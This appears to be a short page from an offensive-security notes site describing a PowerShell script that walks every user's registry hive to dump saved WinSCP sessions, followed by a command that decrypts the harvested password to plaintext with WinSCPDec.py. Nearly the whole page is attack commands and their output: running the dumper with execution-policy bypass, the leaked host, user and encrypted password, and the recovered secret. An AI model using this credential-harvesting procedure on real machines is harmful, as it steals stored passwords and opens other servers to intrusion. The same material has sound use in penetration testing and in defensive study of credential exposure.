Windows - WinSCP

This script will loop through all users in the registry (HKLM) and dump all saved WinSCP sessions.

Exampe Usage

PS E:\devop-scripts> powershell.exe -ExecutionPolicy Bypass .\winscp_dump.ps1
[+] User: void - Session: root@127.0.0.1
  HostName: 127.0.0.1
  UserName: root
  EncPassword: A35C745EFEDC2E3333286D6E6B726C726C726D0834352F152F11250F393F2E39280C3D2F2F2B387D7E7F6D7D7E7F5B3C20AF

[+] Saved all output to logfile: C:\Users\void\AppData\Local\Temp\winscp_dump.log

Decrypt the encrypted password with WinSCPDec.py or similar.

apt-kali :: ~ » python3 WinSCPDec.py --host=127.0.0.1 --user=root --pass=A35C745EFEDC2E3333286D6E6B726C726C726D0834352F152F11250F393F2E39280C3D2F2F2B387D7E7F6D7D7E7F5B3C20AF
[+] Succes!
     ThisIsMySecretPasswd!"#1!"#

GitHub - 0xPThree/Windows-HarvestingGitHub

Last updated 1 year ago

Was this helpful?